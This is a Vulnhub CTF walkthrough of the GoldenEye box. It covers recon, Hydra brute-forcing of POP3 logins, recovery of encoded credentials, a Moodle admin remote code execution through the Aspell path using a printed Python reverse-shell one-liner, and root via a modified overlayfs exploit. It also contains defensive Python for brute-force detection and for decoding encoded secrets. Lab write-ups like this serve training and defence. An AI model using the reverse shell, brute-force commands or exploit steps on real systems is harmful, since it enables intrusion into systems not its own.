GoldenEye: 1 | Vulnhub Walkthrough

egghunter, published in Dot Dot Slash, Sep 1, 2018

GoldenEye is a secret-service-themed challenge developed by creosote and hosted on Vulnhub. It is a CTF-style box rather than a realistic pentest scenario, and it requires quite a bit of 'out of the box' thinking to reach root.

Level: Intermediate

Netdiscover, an alternative to arp-scan, can be used to discover the IP address of the target.

[Screenshot: running netdiscover to discover the IP address of the target]

Breaking the first few pieces of the puzzle

Apart from the web application on port 80, there were two POP3 ports and one SMTP port. The main page suggested navigating to /sev-home/. However, browsing to /sev-home/ prompted for a username and password, and I had no credentials yet.

[Screenshot: detailed nmap scan]
[Screenshot: main site]
[Screenshot: the application prompts for a password on navigating to /sev-home/]

Time to dig deeper! In the HTML source of the page, I found the JavaScript file responsible for the nice home-page animation. In terminal.js I found the first hint: a hard-coded password for boris, stored as HTML character entities, which is trivial to decode. That gave me credentials to access the application.

username: boris
password: InvincibleHack3r

[Screenshot: HTML source of the main page]
[Screenshot: hard-coded password in terminal.js]
[Screenshot: decoding the password]
[Screenshot: access obtained]

Access to the application was of no use. I tried the same credentials against the POP3 service to check whether agent boris had any interesting emails, but the obtained password was not valid for POP3. Honestly, I was stuck here for quite some time.

Having no other leads, I ran a quick brute-force attack against the POP3 service with the username boris. Hydra cracked the password using the fasttrack.txt wordlist that ships with Kali.

hydra -L username -P /usr/share/wordlists/fasttrack.txt -t20 192.168.56.103 -s55007 -I pop3
[Screenshot: brute-force attack on the boris user]
[Screenshot: email communications obtained from the mailbox of boris]

The contents of the emails were not directly exploitable, but from them I was able to work out the usernames of the other agents working on the mission. The same attack could be mounted against those agents as well. I got lucky with natalya.
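From the defender's side, the password-guessing runs described above (first against boris, then against the other agents) leave a characteristic trace in the mail server's authentication log: a burst of failed logins from one source address, followed by a success. The following Python is an added example and not code from the walkthrough; the log format and the log lines are constructed for the example (they are not the box's or any particular server's real format), so LINE_RE would need adapting to the real server's lines.

```python
"""Flag POP3 password-guessing bursts in an authentication log.

Added example, not from the walkthrough. The log format below is
constructed for the example; adapt LINE_RE to the real server's lines.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional

LINE_RE = re.compile(
    r"^(?P<ts>\S+) pop3-login: auth (?P<result>failed|ok) "
    r"user=(?P<user>\S+) rip=(?P<rip>\S+)$"
)

# Constructed sample log: a wordlist run against boris from one host,
# ending in a success, plus a single ordinary typo by another user.
LOG_LINES = [
    "2018-09-01T10:00:00Z pop3-login: auth failed user=boris rip=192.168.56.101",
    "2018-09-01T10:00:00Z pop3-login: auth failed user=boris rip=192.168.56.101",
    "2018-09-01T10:00:01Z pop3-login: auth failed user=boris rip=192.168.56.101",
    "2018-09-01T10:00:01Z pop3-login: auth failed user=boris rip=192.168.56.101",
    "2018-09-01T10:00:02Z pop3-login: auth failed user=boris rip=192.168.56.101",
    "2018-09-01T10:00:02Z pop3-login: auth failed user=boris rip=192.168.56.101",
    "2018-09-01T10:00:03Z pop3-login: auth ok user=boris rip=192.168.56.101",
    "2018-09-01T10:05:00Z pop3-login: auth failed user=natalya rip=192.168.56.50",
    "2018-09-01T10:05:10Z pop3-login: auth ok user=natalya rip=192.168.56.50",
]


def parse_line(line: str) -> Optional[dict]:
    """Parse one constructed log line; return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "result": m["result"],
        "user": m["user"],
        "rip": m["rip"],
    }


def detect_bruteforce(lines, threshold: int = 5, window_s: int = 60) -> List[str]:
    """Return alerts: one failure burst per source IP, plus any success that
    follows such a burst (the signature of a password that was just cracked)."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    reported = set()
    alerts: List[str] = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["rip"]]
        # Drop failures that have fallen out of the sliding window.
        while q and (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if ev["result"] == "failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["rip"] not in reported:
                reported.add(ev["rip"])
                alerts.append(f"burst: {len(q)} failures from {ev['rip']} "
                              f"within {window_s}s (last user {ev['user']})")
        elif len(q) >= threshold:
            alerts.append(f"success-after-burst: {ev['rip']} logged in as "
                          f"{ev['user']} after {len(q)} recent failures")
    return alerts


def run_sample() -> List[str]:
    """Run the detector over the constructed sample log."""
    return detect_bruteforce(LOG_LINES)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

The success-after-burst alert is the one worth paging on: a burst alone may be a misconfigured client, but a successful login from the same source right after a burst means the guessed password worked and the mailbox should be treated as compromised. A lockout or rate limit on the POP3 service, applied per source address and per account, removes the condition the detector is looking for.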

[Screenshot: cracked password of natalya]
[Screenshot: email communications obtained from the mailbox of natalya]

username: xenia
password: RCP90rulez!

That was great! I had credentials for agent xenia. There were a few details in the email worth noting: the box's DNS name, severnaya-station.com, needs to be mapped to its IP in our /etc/hosts file to be able to access the training system.

[Screenshot: configuring the DNS name for the IP of the machine]

Now I could browse to severnaya-station.com/gnocertdir and access the training portal as xenia. The portal is hosted on Moodle, an open-source learning platform.

I couldn't get access to any course materials or attachments from the portal, but there was a message from Dr Doak, the supervisor of the GoldenEye project. In the message he says that his email user id is doak. I ran another hydra attack against the POP3 service with that username.

[Screenshot: access to Moodle as xenia]
[Screenshot: message from Dr Doak]
[Screenshot: brute-force attack on agent doak]

That was the dumbest password a secret service agent could use! Nevertheless, I got access to the email communications using the newly discovered credentials, and from those emails I discovered the credentials to access Moodle as agent Doak.

username: dr_doak
password: 4England!

[Screenshot: access to the mailbox of agent doak]
[Screenshot: access to Moodle as Dr Doak]

I found an interesting attachment on Dr Doak's account which suggested that admin credentials for the application could be obtained from /dir007key/for-007.jpg. Secret messages can be embedded in images using steganography.

[Screenshot: attachment on Dr Doak's account]
[Screenshot: image containing the access key]
[Screenshot: running exiftool on the image]

I ran exiftool on the image and discovered a base64-encoded message in the image metadata. Decoding it gave the credentials for admin access to Moodle.

username: admin
password: xWinter1995x!

[Screenshot: obtained password for admin access]
[Screenshot: access to Moodle as the admin user]
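Both of the "hidden" credentials on this box, the HTML-entity-encoded password in terminal.js and the base64 string in the image metadata, are reversible encodings rather than protection: anyone who can read the file can recover the plaintext. The following Python is an added example, not code from the walkthrough or from the box: a small scanner that looks for runs of numeric character references and whole base64 tokens in a text artefact (client-side JavaScript, exiftool output, a config dump) and decodes them. The JS and metadata samples inside it are constructed stand-ins, not the real file contents from the box; the base64 check uses a printable-text filter because long ordinary words also decode "successfully" to garbage bytes.

```python
"""Find and decode reversibly-encoded secrets in text artefacts.

Added example, not code from the walkthrough. The samples below are
constructed stand-ins for terminal.js and the exiftool output.
"""
import base64
import binascii
import html
import re
from typing import List, Tuple

# A run of at least four numeric character references, e.g. &#73;&#110;...
ENTITY_RUN = re.compile(r"(?:&#x?[0-9a-fA-F]+;){4,}")

# A whole token from the base64 alphabet, 12+ characters, optional padding;
# the look-arounds stop it matching the inside of a longer word.
BASE64_TOKEN = re.compile(
    r"(?<![A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4}){3,}"
    r"(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?(?![A-Za-z0-9+/=])"
)

# Constructed sample: a hard-coded credential stored as HTML entities in JS.
JS_SAMPLE = (
    "// constructed stand-in for terminal.js\n"
    'var pw = "&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;'
    '&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;";\n'
)

# Constructed sample: exiftool-style metadata carrying a base64 string.
EXIF_SAMPLE = (
    "Image Description : eFdpbnRlcjE5OTV4IQ==\n"
    "Author : creosote\n"
)


def _looks_like_text(s: str) -> bool:
    """Reject binary garbage that happens to decode from a long plain word."""
    return s.isprintable() and any(c.isalpha() for c in s)


def find_encoded_secrets(text: str) -> List[Tuple[str, str, str]]:
    """Return (encoding, raw_token, decoded) for every candidate found in text."""
    hits: List[Tuple[str, str, str]] = []
    for m in ENTITY_RUN.finditer(text):
        hits.append(("html-entity", m.group(0), html.unescape(m.group(0))))
    for m in BASE64_TOKEN.finditer(text):
        token = m.group(0)
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if _looks_like_text(decoded):
            hits.append(("base64", token, decoded))
    return hits


def scan_samples() -> List[str]:
    """Decode the two constructed samples and return the recovered strings."""
    return [decoded for _, _, decoded in find_encoded_secrets(JS_SAMPLE + EXIF_SAMPLE)]


if __name__ == "__main__":
    for enc, raw, dec in find_encoded_secrets(JS_SAMPLE + EXIF_SAMPLE):
        print(f"{enc:12} {raw[:40]:40} -> {dec}")
```

Run over a web root or an export of uploaded files, a scanner like this is a cheap way to catch credentials that someone "hid" by encoding them; the fix is to move the secret server-side, not to pick a less obvious encoding.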

Moodle Admin User Remote Code Execution

With admin access to Moodle it is fairly easy to obtain a reverse shell. Moodle's settings include a page for configuring system paths. Aspell is a spell checker that can be installed on Linux and used by Moodle for spell-check actions: whenever a spell check is initiated, Moodle invokes the Aspell binary. By editing the Aspell path we can have Moodle run a reverse shell instead. Below is the payload I used.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
[Screenshot: Moodle system path altered to point to the reverse shell payload]

Once the path is set, create any blog post or page and invoke the spell-check function from the editor to receive the reverse shell connection.

[Screenshot: invoking the spell-check function]
[Screenshot: obtained reverse shell]

Path to root

I started by enumerating the OS version of the box: it was Ubuntu 14.04.1. A Google search showed that this version is vulnerable to the overlayfs exploit (EDB-37292). I compiled it on my machine and transferred it to the target box. On running the exploit I got an error: sh: 1: gcc: not found.

[Screenshot: enumerating the OS version]
[Screenshot: exploit failed as there was no gcc on the target]

There was no gcc on the target box. Looking at the exploit-db 37292 source, on line number 143 you can see that the exploit itself invokes gcc at runtime. Well, that was tricky.

lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");

I enumerated the box with linuxprivchecker.py to list the installed development tools. There was no gcc on the box, but there was cc. cc is the name of the original UNIX C compiler command. I am no expert on the exact difference between cc and gcc. I changed gcc to cc in the exploit source and compiled it; the resulting binary rooted the box for me.

The root flag can be read from the root folder: 568628e0d993b1973adc718237da6e93

[Screenshot: enumerating installed development tools]
[Screenshot: modifying the source to replace gcc with cc]
[Screenshot: rooted using the overlayfs exploit]
[Screenshot: flag.txt]

GoldenEye had a nice plot and it was a thrilling experience overall. It took me a bit longer to break this box than boxes of similar difficulty. I recommend this box to folks interested in puzzles.
